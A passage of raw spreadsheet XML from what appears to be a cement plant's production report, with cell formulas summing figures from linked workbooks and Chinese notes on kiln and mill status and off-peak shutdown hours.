        <f>(M52+M53)/(65000+80000)*100</f>
        <v>52.3671282758968</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'[13]5'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]5'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'4'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]5'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'4'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]5'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]5'!$M$21+'[14]5'!$M$22+'[14]5'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]5'!$N$21+'[14]5'!$N$22+'[14]5'!$N$35</f>
        <v>44.43</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'4'!U53</f>
        <v>219.43</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38553.857</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]5'!$Q$21+'[14]5'!$Q$22+'[14]5'!$Q$35</f>
        <v>27</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'4'!X53</f>
        <v>293</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39784</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]5'!$T$21+'[14]5'!$T$22+'[14]5'!$T$35</f>
        <v>1575.377</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]5'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'4'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]5'!$I$47</f>
        <v>644.227</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'4'!K54</f>
        <v>5487.172</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>216929.022</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]5'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]5'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]5'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]5'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'4'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]5'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'4'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]5'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]5'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'4'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]5'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'4'!K55</f>
        <v>581.555</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>36017.205</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]5'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]5'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]5'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]5'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]5'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]5'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]5'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]5'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]5'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'4'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'4'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]5'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：正常。</v>
      </c>
      <c r="R56" s="261"/>
      <c r="S56" s="261"/>
      <c r="T56" s="261"/>
      <c r="U56" s="261"/>
      <c r="V56" s="261"/>
      <c r="W56" s="261"/>
      <c r="X56" s="261"/>
      <c r="Y56" s="261"/>
      <c r="Z56" s="262"/>
    </row>
    <row r="57" ht="15.75" customHeight="1" spans="1:26">
      <c r="A57" s="191"/>
      <c r="B57" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C57" s="193"/>
      <c r="D57" s="193"/>
      <c r="E57" s="194">
        <v>160000</v>
      </c>
      <c r="F57" s="194"/>
      <c r="G57" s="225"/>
      <c r="H57" s="194">
        <f>G57+'4'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'4'!K57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G58+'4'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'4'!K58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G59+'4'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'4'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]5'!$Q$65</f>
        <v>窑:正常。A组磨：8:00-11:00避峰停机;16:25-24:00避峰停机。D1#磨：8:00-10:00避峰停机;20:00-24:00避峰停机，D2#磨：8:00-10:00避峰停机;20:00-24:00避峰停机。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G60+'4'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'4'!K60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'[14]5'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]5'!$E$6</f>
        <v>2799</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'4'!H61</f>
        <v>15277</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1131150</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]5'!$E$21</f>
        <v>4444.91</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'4'!K61</f>
        <v>18549.18</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1119709.26</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]5'!$H$6</f>
        <v>34496.9899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>66.3403653846152</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'[14]5'!$M$11+'[14]5'!$M$12+'[14]5'!$M$13+'[14]5'!$M$14+'[14]5'!$M$15+'[14]5'!$M$16+'[14]5'!$M$17+'[14]5'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]5'!$N$11+'[14]5'!$N$12+'[14]5'!$N$13+'[14]5'!$N$14+'[14]5'!$N$15+'[14]5'!$N$16+'[14]5'!$N$17+'[14]5'!$N$18</f>
        <v>4489</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'4'!H62</f>
        <v>10720</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>846713.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]5'!$Q$11+'[14]5'!$Q$12+'[14]5'!$Q$13+'[14]5'!$Q$14+'[14]5'!$Q$15+'[14]5'!$Q$16+'[14]5'!$Q$17+'[14]5'!$Q$18</f>
        <v>2015</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'4'!K62</f>
        <v>11104</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>845576.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]5'!$T$11+'[14]5'!$T$12+'[14]5'!$T$13+'[14]5'!$T$14+'[14]5'!$T$15+'[14]5'!$T$16+'[14]5'!$T$17+'[14]5'!$T$18</f>
        <v>18070.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>72.2825359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]5'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]5'!$M$19+'[14]5'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]5'!$N$19+'[14]5'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'4'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]5'!$Q$19+'[14]5'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'4'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]5'!$T$19+'[14]5'!$T$20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G64+'4'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'4'!K64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G65+'4'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'4'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]5'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:15:00-22:15避峰停机。2#磨:8:00-24:00避峰停机。3#磨:7:35-10:15避峰停机。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G66+'4'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'4'!K66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G67+'4'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'4'!K67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'[15]5'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]5'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'4'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]5'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'4'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]5'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]5'!$Q$77</f>
        <v>1#磨10:00-22:15避峰停机:12.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]5'!$D$43+'[15]5'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]5'!$E$43+'[15]5'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'4'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]5'!$H$43+'[15]5'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'4'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]5'!$K$43+'[15]5'!$K$44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'[15]5'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]5'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'4'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]5'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'4'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]5'!$K$45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G71+'4'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'4'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]5'!$Q$80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G72+'4'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'4'!K72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G73+'4'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'4'!K73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G74+'4'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'4'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]5'!$Q$83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G75+'4'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'4'!K75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G76+'4'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'4'!K76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G77+'4'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'4'!K77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G78+'4'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'4'!K78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'[16]5'!$E$7</f>
        <v>549.38</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'4'!H79</f>
        <v>2714.1</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>149842.57</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]5'!$I$7</f>
        <v>375.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'4'!K79</f>
        <v>2458.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>144349.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]5'!$L$7</f>
        <v>5140.38</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.28076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'[16]5'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'4'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]5'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'4'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]5'!$Y$15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G81+'4'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'4'!K81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G82+'4'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'4'!K82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G83+'4'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'4'!K83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G84+'4'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'4'!K84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G85+'4'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'4'!K85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6/31</f>
        <v>0.193548387096774</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45997</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26527.77</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'5'!H5</f>
        <v>129175.87</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6284041.9</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>22409.15</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'5'!K5</f>
        <v>136274.347</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6286345.478</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>260523.157</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>69.6585981283422</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]6'!$W$101</f>
        <v>272.708333333333</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]6'!$X$101</f>
        <v>273.319444444444</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]6'!$Y$101</f>
        <v>260.298660545764</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]6'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]6'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]6'!$V$101</f>
        <v>65.2857720588235</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]6'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]6'!$R$101</f>
        <v>144</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]6'!$S$101</f>
        <v>5327.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]6'!$D$23+'[11]6'!$D$17+'[12]6'!$D$17+'[13]6'!$D$25+'[14]6'!$D$8+'[14]6'!$D$15+'[15]6'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]6'!$E$23+'[11]6'!$E$17+'[12]6'!$E$17+'[13]6'!$E$25+'[14]6'!$E$8+'[14]6'!$E$15+'[15]6'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'5'!H6</f>
        <v>948</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>277297.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]6'!$I$23+'[11]6'!$I$17+'[12]6'!$I$17+'[13]6'!$I$25+'[14]6'!$E$23+'[14]6'!$E$30+'[15]6'!$H$7</f>
        <v>671.11</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'5'!K6</f>
        <v>4420.41</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>266618.11</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]6'!$L$23+'[11]6'!$L$17+'[12]6'!$L$17+'[13]6'!$L$25+'[14]6'!$H$23+'[14]6'!$H$30+'[15]6'!$K$7</f>
        <v>28640.43</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]6'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]6'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]6'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]6'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]6'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]6'!$V$102</f>
        <v>34.8676348039216</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]6'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]6'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]6'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]6'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]6'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'5'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]6'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'5'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]6'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]6'!$W$107</f>
        <v>133.539276257723</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]6'!$X$107</f>
        <v>124.263141902157</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]6'!$Y$107</f>
        <v>131.733463988241</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]6'!$T$107</f>
        <v>47.2083333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]6'!$U$107</f>
        <v>45.7083333333333</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]6'!$V$107</f>
        <v>31.2653186274509</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]6'!$Q$107</f>
        <v>11.33</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]6'!$R$107</f>
        <v>65.82</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]6'!$S$107</f>
        <v>2551.25</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]6'!$D$27+'[11]6'!$D$18+'[13]6'!$D$26+'[14]6'!$D$10+'[14]6'!$D$17+'[15]6'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]6'!$E$27+'[11]6'!$E$18+'[13]6'!$E$26+'[14]6'!$E$10+'[14]6'!$E$17+'[15]6'!$E$9</f>
        <v>4514</v>
      </c>
